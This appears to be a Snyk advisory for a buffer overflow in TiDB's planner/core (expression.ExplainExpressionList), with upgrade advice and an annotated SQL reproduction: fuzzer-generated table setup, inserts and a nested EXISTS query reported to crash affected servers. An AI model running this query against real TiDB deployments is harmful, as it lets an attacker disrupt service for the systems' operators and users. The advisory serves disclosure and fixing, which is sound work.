Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
Upgrade github.com/pingcap/tidb/pkg/planner/core to version 8.2.0 or higher.
Affected versions of this package are vulnerable to Buffer Overflow via the component expression.ExplainExpressionList. An attacker can disrupt service by sending specially crafted input.
-- Fixture table for the reproduction that follows. The NONCLUSTERED primary key
-- and the shard_row_id_bits / pre_split_regions table options are TiDB-specific
-- syntax; the script will not run on plain MySQL.
-- Column names and widths are fuzzer-generated and carry no business meaning;
-- only c_w_jr14qm2 (primary key), c_t3nd927 and c_ts are referenced by the
-- statements below.
create table t_ldpj7bp (
c_w_jr14qm2 int ,
c_t3nd927 int ,
c_ts int ,
c_s text ,
c_qchmg double ,
c_r int ,
c_olb3fsg6 text ,
c_zkbe tinyint ,
primary key(c_w_jr14qm2) NONCLUSTERED) shard_row_id_bits=8 pre_split_regions=5;
-- sql #267
-- Adds one TiFlash (columnar) replica of the table. Replica creation is
-- asynchronous; the note before the SELECT below asks the reader to wait,
-- presumably so the replica is available when the query is planned — TODO confirm.
alter table t_ldpj7bp set tiflash replica 1;
-- Seeds four rows. The literals are fuzzer output: nested casts of NULL,
-- IN / NOT IN lists, and NOT NOT(cast(... as unsigned)) wrappers that all
-- collapse to NULL or a 0/1 value for the tinyint column c_zkbe.
-- 18446744073709551616.5 (just above 2^64) goes into the double column c_qchmg.
-- Explicit column list keeps the statement valid if the table gains columns.
insert into t_ldpj7bp (c_w_jr14qm2, c_t3nd927, c_ts, c_s, c_qchmg, c_r, c_olb3fsg6, c_zkbe) values
(730552758, -682774206, 1698439632, 'lrvil359', 18446744073709551616.5, cast(cast(null as signed) as signed), 'oj1', (-1367510804 in (
2123597870, 1485484027))),
(-1001332962, -1396443960, cast(cast(null as signed) as signed), 'e43lh', 15.54, -1568307927, 'i', (-1162033997 not in (
-1850570375, -781179836, -1281662147, -431391092, cast(null as signed)))),
(-727295464, 1998529670, -1873237194, 'lps56o', 70.81, 1380690610, cast(null as char), ((NOT NOT(cast( (cast(cast(null as signed) as signed) && cast(2536017375093623800 as signed)) as unsigned))))
and ((NOT NOT(cast( (cast(2051320819 as signed) <=> cast(-8632453786780487783 as signed)) as unsigned))))),
(2133408768, 736339957, -1486317339, 'f', 62.97, -1444096406, 'tj', (NOT NOT(cast( (cast(cast(null as char) as char) = cast(cast(null as char) as char)) as unsigned))));
-- [[NOTE]] please wait a while before executing the following sql, otherwise the bug may not be triggered.
-- The statement the advisory attributes to expression.ExplainExpressionList.
-- On an affected server (planner/core before 8.2.0) planning this query is
-- reported to fault and disrupt service; on a fixed server it simply returns
-- up to 55 rows of c_t3nd927 ordered ascending.
--
-- Shape worth noting for anyone triaging the fix:
--   * the EXISTS subquery selects a constant NULL aliased c0 and then
--     ORDER BYs c0 — presumably the alias, not subq_0.c0 of the same name;
--   * the derived table subq_0 has a WHERE on constants only (no row reference);
--   * the only correlation to the outer query is ref_0.c_t3nd927 on the
--     subquery's WHERE;
--   * `||` in subq_0 is logical OR under MySQL-compatible settings, not string
--     concatenation — TODO confirm sql_mode (PIPES_AS_CONCAT) on the test server.
SELECT
ref_0.c_t3nd927 as c2
FROM
t_ldpj7bp as ref_0
WHERE
(EXISTS (
select distinct
cast(cast(null as signed) as signed) as c0
from
(select
ref_1.c_w_jr14qm2 as c0,
ref_1.c_ts as c1
from
t_ldpj7bp as ref_1
where (NOT NOT(cast( (cast(2147483648.100000 as double) || cast(78.5 as double)) as unsigned)))) as subq_0
where (NOT NOT(cast( (cast(ref_0.c_t3nd927 as signed) <> cast(-2308981195293685378 as signed)) as unsigned)))
order by c0 desc))
ORDER BY
c2 ASC
LIMIT 55;